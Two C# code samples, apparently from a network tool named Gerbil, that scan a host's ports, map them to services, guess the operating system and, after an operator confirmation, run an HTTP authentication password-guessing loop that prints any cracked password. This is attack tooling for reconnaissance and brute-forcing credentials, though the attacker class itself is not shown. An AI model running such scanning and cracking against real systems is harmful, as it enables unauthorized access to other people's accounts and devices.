Exemplo n.º 1
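        /// <summary>
        /// Runs the interactive sequence against a single host: scans a fixed port range,
        /// maps the open ports to service names, prints the engine's OS guess and, if the
        /// operator confirms the prompt, starts the HTTP auth password-guessing loop.
        /// </summary>
        /// <param name="ipAddress">IP address or relative hostname to target.</param>
        /// <param name="timeout">
        /// Passed unchanged to <c>PortScanner.scan</c>; presumably a per-probe timeout,
        /// unit not visible here (TODO confirm against the scanner).
        /// </param>
        public static void begin(string ipAddress, int timeout)
        {
            // Range handed to the scanner. Whether the upper bound is inclusive depends on
            // PortScanner.scan, which is not visible here.
            const int firstPort = 0;
            const int lastPort = 1000;

            // Scan device for open ports
            Out.writeln("Probing ports...");
            int[] openPorts = Gerbil_Scanners.PortScanner.scan(ipAddress, firstPort, lastPort, timeout);
            if (openPorts.Length == 0)
            {
                Out.writeln("No open ports found for the specified host and port range.");
                return;
            }
            foreach (int port in openPorts)
            {
                Out.writeln("Found port: " + port);
            }

            // Get list of services
            Out.writeln("Looking up port definitions...");
            string[] openServices = Gerbil_PortServices.PortLookup.getServices(openPorts);
            if (openServices.Length == 0)
            {
                Out.writeln("No known services found in AI store. Add them manually using 'portservice add serviceName portNumber'");
                return;
            }
            Out.writeln("Found service: ");
            foreach (string service in openServices)
            {
                Out.writeln(service);
            }

            if (openServices.Contains("NETBIOS"))
            {
                // NOTE(review): this is a resolver lookup via Dns.GetHostEntry, not a NetBIOS
                // query, so the "NETBIOS Name" label may not describe the value printed.
                // A failed lookup throws and is not handled here; it propagates to the caller.
                string devName = Dns.GetHostEntry(ipAddress).HostName;
                Out.writeln("NETBIOS Name: " + devName);
            }

            // Forward found services to the AI engine and get server OS
            //TODO: forward training parameter
            Gerbil_Engine.NetworkResult osr = Gerbil_Engine.GerbilRunner.guessOS(openServices, true);

            // NOTE(review): the previous code scaled a local copy of the certainty by 10 and
            // never used it. The value printed is the raw getCertainty() followed by '%';
            // confirm which scale getCertainty() returns before trusting the figure.
            Out.writeln("OS Guess: " + osr.getName());
            Out.writeln(String.Format("Certainty: {0:F2}%", osr.getCertainty()));

            // Guess more data based on running services
            // HTTP
            if (!openServices.Contains("HTTP"))
            {
                return;
            }

            // The operator has to confirm before any authentication attempt is made.
            if (!In.securePrompt("Pathfinder", "HTTP Auth Password Crack"))
            {
                return;
            }

            int pLength = In.prompt <int>("Maximum length of password");
            Out.writeln("Cracking password...");
            Gerbil.Attackers.HTTPAuthAttacker HAA = new Attackers.HTTPAuthAttacker(ipAddress, pLength);

            // Each pass calls stab() once (presumably one authentication attempt; confirm in
            // HTTPAuthAttacker). On the receiving side this appears as a run of failed
            // auth requests from a single source.
            while (true)
            {
                Out.write("*");
                Gerbil.Attackers.AttackerResult AR;
                try
                {
                    AR = HAA.stab();
                }
                catch (Exception ex)
                {
                    // Previously swallowed without a trace; say why the loop stopped.
                    Out.writeln("\nHTTP auth attempt aborted: " + ex.Message);
                    break;
                }

                if (AR == Attackers.AttackerResult.FailedAuth || AR == Attackers.AttackerResult.FailedConnection)
                {
                    Out.writeln("\nFailed to crack password using given parameters.");
                    break;
                }

                if (AR == Attackers.AttackerResult.Connected)
                {
                    // NOTE(review): the recovered credential is written in clear text through
                    // Out; anything capturing that output (scrollback, redirected logs)
                    // retains it. Confirm that this is intended.
                    Out.blank();
                    Out.writeln(String.Format("CRACKED: Password is \"{0}\".", HAA.getAccessString()));
                    break;
                }

                // AttackerResult.Trying (or any other value): go round again.
            }
        }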
Exemplo n.º 2
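        /// <summary>
        /// Runs the automatic sequence against a device stored in the database: probes every
        /// port known to the port-service lookup, maps the open ones to service names, prints
        /// the engine's OS guess and, if the operator confirms the prompt, starts the HTTP
        /// auth password-guessing loop.
        /// </summary>
        /// <param name="DBref">Device database the target record is read from.</param>
        /// <param name="devID">Key of the device record whose IP address is used.</param>
        /// <param name="pingTimeout">
        /// Passed unchanged to <c>PortScanner.scan</c> for each port; presumably a per-probe
        /// timeout, unit not visible here (TODO confirm against the scanner).
        /// </param>
        private static void attackDeviceAuto(ref Database <Data.Models.Devices.Device> DBref, string devID, int pingTimeout)
        {
            Out.blank();
            // Get data from DB
            string address = DBref.Read(devID).getDeviceIPAddress().ToString();

            // Scan device for open ports: only ports the lookup table knows are probed.
            Out.writeln("Probing known ports on " + address + "...");
            int[]      knownPorts = Gerbil_PortServices.PortLookup.getPorts();
            List <int> foundPorts = new List <int>();

            foreach (int port in knownPorts)
            {
                bool isOpen = Gerbil_Scanners.PortScanner.scan(address, port, pingTimeout);
                if (isOpen)
                {
                    foundPorts.Add(port);
                }
                Out.writeln(port + (isOpen ? ": OPEN" : ": CLOSED"));
            }

            int[] openPorts = foundPorts.ToArray();
            if (openPorts.Length == 0)
            {
                Out.writeln("No open ports found for the specified host and port range.");
                return;
            }

            // Get list of services
            Out.writeln("Looking up port definitions...");
            string[] openServices = Gerbil_PortServices.PortLookup.getServices(openPorts);
            if (openServices.Length == 0)
            {
                Out.writeln("No known services found in AI store. Add them manually using 'portservice add serviceName portNumber'");
                return;
            }
            Out.writeln("Found service: ");
            foreach (string service in openServices)
            {
                Out.writeln(service);
            }

            if (openServices.Contains("NETBIOS"))
            {
                // NOTE(review): this is a resolver lookup via Dns.GetHostEntry, not a NetBIOS
                // query, so the "NETBIOS Name" label may not describe the value printed.
                // A failed lookup throws and is not handled here; it propagates to the caller.
                string devName = Dns.GetHostEntry(address).HostName;
                Out.writeln("NETBIOS Name: " + devName);
            }

            // Forward found services to the AI engine and get server OS
            //TODO: forward training mode parameter
            Gerbil_Engine.NetworkResult osr = Gerbil_Engine.GerbilRunner.guessOS(openServices, true);

            // NOTE(review): the previous code scaled a local copy of the certainty by 1000 and
            // never used it. The value printed is the raw getCertainty() followed by '%';
            // confirm which scale getCertainty() returns before trusting the figure.
            Out.writeln("OS Guess: " + osr.getName());
            Out.writeln(String.Format("Certainty: {0:F2}%", osr.getCertainty()));

            // Guess more data based on running services
            // HTTP
            if (!openServices.Contains("HTTP"))
            {
                return;
            }

            // The operator has to confirm before any authentication attempt is made.
            if (!In.securePrompt("AttackMethods", "HTTP Auth Password Crack"))
            {
                return;
            }

            int pLength = In.prompt <int>("Maximum length of password");
            Out.writeln("Cracking password...");
            Gerbil.Attackers.HTTPAuthAttacker HAA = new Attackers.HTTPAuthAttacker(address, pLength);

            // Each pass calls stab() once (presumably one authentication attempt; confirm in
            // HTTPAuthAttacker). On the receiving side this appears as a run of failed
            // auth requests from a single source.
            while (true)
            {
                Out.write("*");
                Gerbil.Attackers.AttackerResult AR;
                try
                {
                    AR = HAA.stab();
                }
                catch (Exception ex)
                {
                    // Previously a bare catch that hid the cause; say why the loop stopped.
                    Out.writeln("\nHTTP auth attempt aborted: " + ex.Message);
                    break;
                }

                if (AR == Attackers.AttackerResult.FailedAuth || AR == Attackers.AttackerResult.FailedConnection)
                {
                    Out.writeln("\nFailed to crack password using given parameters.");
                    break;
                }

                if (AR == Attackers.AttackerResult.Connected)
                {
                    // NOTE(review): the recovered credential is written in clear text through
                    // Out; anything capturing that output (scrollback, redirected logs)
                    // retains it. Confirm that this is intended.
                    Out.blank();
                    Out.writeln(String.Format("CRACKED: Password is \"{0}\".", HAA.getAccessString()));
                    break;
                }

                // AttackerResult.Trying (or any other value): go round again.
            }
        }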